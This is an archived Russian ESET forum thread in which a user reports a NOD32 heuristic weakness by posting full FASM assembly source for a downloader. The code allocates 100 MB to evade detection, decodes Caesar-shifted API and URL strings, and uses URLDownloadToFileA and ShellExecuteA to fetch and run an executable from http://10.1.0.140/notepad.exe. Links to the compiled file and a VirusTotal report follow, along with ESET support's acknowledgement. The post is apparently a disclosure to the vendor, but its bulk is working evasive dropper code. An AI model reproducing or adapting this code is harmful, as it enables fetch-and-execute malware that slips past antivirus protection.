Дорогие участники форума!

Наш форум переведен в режим работы "только для чтения", публикация новых тем и сообщений недоступна. Мы искренне благодарны вам за то, что были с нами, но пришло время двигаться дальше.

На данный момент приобретение лицензий ESET через наш сайт недоступно.
В качестве альтернативы предлагаем антивирусные решения PRO32 — надёжную защиту от киберугроз и высокую производительность для устройств на Windows и Android.

Приглашаем вас присоединиться к новому форуму PRO32.

Для действующих клиентов ESET мы предлагаем промокод на скидку в размере 15% — ESET15. Добавьте лицензию в корзину и примените промокод при оформлении заказа.

Недостаток эвриста NOD32

1
RSS
Это простая программа для тестирования антивирусов. Она скачивает и запускает файл "http://10.1.0.140/notepad.exe".
Программа пытается выделить область памяти в 100Мб, если не удается, то завершается, если удается, то копирует в данную память и передает управление на немного обфусцированный код, который скачивает и запускает файл. Если пытаться выделять меньше 10 МБ, то ESET NOD32 детектирует данную программу.

Код
format pe GUI 4.0
entry main
include 'win32ax.inc'
section ''code import writeable readable executable
library kernel32,'kernel32'
import kernel32,ExitProcess,'ExitProcess',\
VirtualAlloc,'VirtualAlloc',\
LoadLib,'LoadLibraryA',\
GetProcAdd, 'GetProcAddress',\
FreeLib, 'FreeLibrary'

main:
invoke VirtualAlloc,NULL,1024*1024*100,0x1000,0x40
cmp eax,0
je endprog
mov esi,eax
xor ecx,ecx
mov edx,ldcode
memcp:
mov bl, [edx]
mov [eax], bl
inc eax
inc edx
inc ecx
cmp ecx,1023
je endprog
;-eOfCd-
cmp byte [edx],'-'
jne memcp
cmp byte [edx+1],'e'
jne memcp
cmp byte [edx+2],'O'
jne memcp
cmp byte [edx+3],'f'
jne memcp
cmp byte [edx+4],'C'
jne memcp
cmp byte [edx+5],'d'
jne memcp
cmp byte [edx+6],'-'
jne memcp
jmp esi
endprog:
invoke ExitProcess,0

ldcode:
;[esi]
mov edi,esi
add edi,10
add esi,109
jmp esi
;[edi]
;_urlmon
db   'vsmnpo/emm',1;urlmon.dll
;[edi+11]
;_shell
db   'tifmm43/emm',1;shell32.dll
;[edi+23]
;_URLDownloadToFile
db   'VSMEpxompbeUpGjmfB',1;URLDownloadToFileA
;[edi+42]
;_ShellExecute
db   'TifmmFyfdvufB',1;ShellExecuteA
;[edi+56]
;_file
db    '`uftu`/fyf',1
;'_test_.exe',0
;[edi+67]
;_url
db    'iuuq;0021/2/1/2510opufqbe/fyf',1,2
;'http://10.1.0.140/notepad.exe',0,1
db 3Ch
;[edi+99]
;[esi]
mov ecx,146420
;[esi+5]
mov ebx,edx
xor eax,eax
dec ecx
lahf
and eax,100000000000000b
shr eax,14
mov edx,esi
add edx,5
imul eax,1Bh
add edx,eax
jmp edx

db 1Ah

;[esi+1Bh]
xor eax, eax
;[esi+1Dh]
mov ecx, edi
;[esi+1Fh]
mov ebx, edi
;[esi+21h]
add esi,29h
;[esi]
cmp byte [ebx], 2
lahf
and eax,100000000000000b
shr eax,14
mov edx,esi
;add edx,1Ch
imul eax,1Ah
add edx,eax
dec byte [ebx]
inc ebx
push edi
jmp edx
db 0FFh
;[esi+1Ah]
call [LoadLib]
;get procAdd from urldownloadtofile.
mov edx,edi
add edx,23
push edx
;        push _URLDownloadToFile
push eax
call [GetProcAdd]

;downloades our target file and save it to _file
   push eax
   push 0
   push 0
;        push _file
   mov edx,edi
   add edx,56
   push edx
;       push _url
   mov edx,edi
   add edx,67
   push edx
   push 0
   call eax
   pop eax
   invoke FreeLib, eax

;loads shell32.dll
;       push _shell
   mov edx,edi
   add edx,11
   invoke LoadLib, edx

;get procAdd from shellexec
;        push _ShellExecute
   mov edx,edi
   add edx,42
   push edx
   push eax
   call [GetProcAdd]

   
;runs _file using shellexec
   push eax
   push SW_SHOW
   push 0
   push 0
   mov edx,edi
   add edx,56
   push edx
   ;push _file
   push 0
   push 0
   call eax
   pop eax
   invoke FreeLib, eax

   invoke ExitProcess, 0

endsig db '-eOfCd-'


Отчет вирустотала:
https://www.virustotal.com/file/acf03eea070f30f09e62305465f14d04a44318fb9f5259bc2cb­5838e027af0e1/analysis/1328850462/

Сам файл:
http://rghost.ru/36438523

Также отправил данную информацию через http://esetnod32.ru/.support/knowledge_base/new_virus/index.php (на английском языке).
Изменено: av-fasm - 10.02.2012 10:08:07
Ваш запрос в техподдержку получен и передан в вирусную лабораторию.
ESET Technical Support
1
Читают тему